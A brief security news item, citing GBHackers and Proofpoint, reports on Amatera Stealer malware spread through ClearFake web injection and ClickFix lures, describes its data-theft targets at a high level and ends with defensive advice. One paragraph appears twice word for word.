Attacks with the more sophisticated ACR Stealer-based Amatera Stealer malware have been launched as part of ClearFake web injection campaigns involving EtherHiding, Binance Smart Chain contract, and ClickFix exploitation between April and May, according to GBHackers News.
Threat actors lured targets into executing malicious commands via the Windows Run dialog, enabling the deployment of Amatera Stealer, a report from Proofpoint showed. Aside from leveraging NTSockets for command-and-control communications and WoW64 Syscalls for API execution, Amatera Stealer also conceals browser, cryptocurrency wallet, messaging app, and email client data theft through hardcoded IP addresses. Additional payloads could also be executed by Amatera Stealer owing to its C2 configuration, said Proofpoint researchers, who also noted the information-stealing payload to be spread using cracked software and phony downloads. Such findings should prompt not only strengthened user training programs on social engineering techniques but also limited execution of unauthorized PowerShell scripts, researchers added.
Threat actors lured targets into executing malicious commands via the Windows Run dialog, enabling the deployment of Amatera Stealer, a report from Proofpoint showed. Aside from leveraging NTSockets for command-and-control communications and WoW64 Syscalls for API execution, Amatera Stealer also conceals browser, cryptocurrency wallet, messaging app, and email client data theft through hardcoded IP addresses. Additional payloads could also be executed by Amatera Stealer owing to its C2 configuration, said Proofpoint researchers, who also noted the information-stealing payload to be spread using cracked software and phony downloads. Such findings should prompt not only strengthened user training programs on social engineering techniques but also limited execution of unauthorized PowerShell scripts, researchers added.
